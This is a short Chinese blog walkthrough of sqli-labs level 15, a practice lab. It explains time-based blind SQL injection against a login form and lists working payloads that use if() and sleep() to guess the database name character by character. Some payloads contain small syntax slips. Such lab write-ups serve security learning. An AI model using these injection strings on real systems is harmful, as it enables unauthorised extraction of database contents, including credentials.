- 1软件测试之-软件缺陷管理 _bug处理流程图
- 2关于MPU6050姿态解算的一阶互补滤波方法(从原理到代码实现)_互补滤波系数公式
- 3简单易懂的Docker下载安装教程:快速上手容器化应用
- 4GPU在外卖场景精排模型预估中的应用实践_大模型训练场景gpu需求量如何评估
- 5报告 | 腾讯知文,从0到1打造下一代智能问答引擎【CCF-GAIR】
- 6Mybatis中对象关系映射_mybatis映射对象
- 7【WSN定位】基于chan算法、fang算法、taylor算法和最小二乘定位算法lsm实现目标定位matlab源码_chan算法和最小二乘法
- 8LDA主题模型及Python实现_python lda模型主题分析
- 9using-aws-s3-buckets-cloudfront-distribution-with-craft-cms_yxokd
- 10在群晖NAS部署_开源在线项目任务管理工具【dooTask】
sqli-labs第十五关_sqllibs第十五关为什么一定要是admin
赞
踩
/*盲注
本关属于时间注入,基于源码分析,闭合字符是单引号。
本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句
页面无回显,单靠页面无法判断闭合方式,所以得查看源码
根据源码知道是单引号闭合
利用延时注入进行。
uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
正确的时候可以直接登录,不正确的时候这里会延时 5 秒。
*/
在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注
查看根目录下本关的源码:
猜想正确
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。)
admin’ and if(length(database()=8),sleep(5),1) #
这句话意思就是 如果条件成立,就停止5秒
输入 admin’ and if(length(database()=8),sleep(5),1) #
看这延迟5秒中,说明猜想数据库8位正确
我们继续猜解库名
admin’ and if(substr(database(),1,1)=‘s’,sleep(5),1#
admin’ and if(substr(database(),2,1)=‘e’,sleep(5),1)#
admin’ and if(substr(database(),3,1)=‘c’,sleep(5),1)#
admin’ and if(substr(database(),4,1)=‘u’,sleep(5),1)#
admin’ and if(substr(database(),5,1)=‘r’,sleep(5),1)#
admin’ and if(substr(database(),6,1)=‘i’,sleep(5),1)#
admin’ and if(substr(database(),7,1)=‘t’,sleep(5),1)#
admin’ and if(substr(database(),8,1)=‘y’,sleep(5),1)#
像这样继续猜解不断尝试
......
如果想进一步得到用户、密码信息,继续不断猜解…
反正盲注很麻烦并且浪费时间!
最后就是猜数据库表和猜数据库了,这里就不在叙述了。
